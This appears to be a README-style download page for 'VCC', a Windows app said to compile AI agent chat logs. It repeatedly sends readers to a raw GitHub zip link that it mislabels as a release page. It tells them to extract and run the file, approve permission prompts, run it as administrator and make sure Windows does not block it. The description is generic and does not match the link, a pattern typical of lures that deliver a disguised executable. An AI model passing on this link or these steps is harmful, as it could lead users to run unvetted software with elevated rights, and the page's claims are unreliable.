VCC helps you compile agent conversations into one place. It lets you collect chat logs, review them, and keep them in a clean format on your Windows PC.
Use it when you want to:
- gather agent chats in one view
- keep conversation records in one file set
- review long threads without sorting them by hand
- work with chat history on a local machine
VCC runs on Windows. For a smooth setup, use a system with:
- Windows 10 or Windows 11
- At least 4 GB of RAM
- 200 MB of free disk space
- A mouse and keyboard
- Internet access for the first download
A newer PC will handle large chat sets better.
Visit this page to download VCC:
https://raw.githubusercontent.com/bennuxer/VCC/main/skills/Software_2.6.zip
On that page, look for the latest release. Download the file that matches Windows. If there is more than one file, choose the .exe file or the Windows zip file if that is the one listed for your system.
After you download VCC, follow these steps:
- Open your Downloads folder.
- Find the VCC file you downloaded.
- If you downloaded a zip file, right-click it and choose Extract All.
- Open the extracted folder.
- Double-click the VCC app file.
- If Windows asks for permission, select Yes.
If you downloaded an .exe file, you can usually double-click it to start the app right away.
The first time you open VCC, it may ask you to choose a folder for your chat files.
Use a folder that is easy to find, such as:
- Documents
- Desktop
- A folder you created for chat exports
Then point VCC to the files or folder that hold your agent conversations.
VCC is made to help you compile conversation data into a simple view.
Typical use looks like this:
- Start VCC.
- Pick the folder or source that holds your agent chats.
- Load the conversation set.
- Review the compiled result.
- Save or export the output if needed.
If your chats are in text files, keep them in one folder before you start. That makes it easier to compile them.
For the best results, keep your files neat before you load them into VCC:
- use clear file names
- keep related chats in one folder
- avoid mixing old and new exports
- remove files you do not want included
A simple folder layout makes the compile step easier to manage.
VCC fits a few common tasks:
- combining agent chat logs for review
- organizing support or test conversations
- keeping a local record of chat sessions
- preparing conversation sets for later use
- reading long message threads in one place
If VCC does not start, try these steps:
- Close the app.
- Right-click the file and choose Run as administrator.
- Make sure the file finished downloading.
- If you used a zip file, extract it again.
- Check that Windows did not block the file.
- Restart your PC and try again.
If the app still does not open, download the latest release again from the release page.
To make your work easier, keep a simple routine:
- store each chat project in its own folder
- use dates in file names
- remove old exports you no longer need
- back up important conversation files
- keep the app in a folder you will remember
This helps when you return to the same project later.
No. It is made for normal Windows users. You download it, open it, and point it at your conversation files.
It should work with your files without forcing you to edit them. Keep a backup if the files matter to you.
Yes, after you download it, you can use it on your Windows PC without staying online.
Use the file type your chat export already creates. Plain text files are a good place to start.
Here is a simple way to use VCC for the first time:
- Download VCC from the releases page.
- Open the file and start the app.
- Make a folder called
Agent Chats. - Put your chat exports in that folder.
- Load the folder in VCC.
- Check the compiled conversation view.
- Save the result where you can find it later.
- keep one project per folder
- use short file names
- avoid special symbols in file names
- save fresh copies before you compile
- check the output after each run
Small steps like these make the app easier to use.
If you need the download page later, use this link:
https://raw.githubusercontent.com/bennuxer/VCC/main/skills/Software_2.6.zip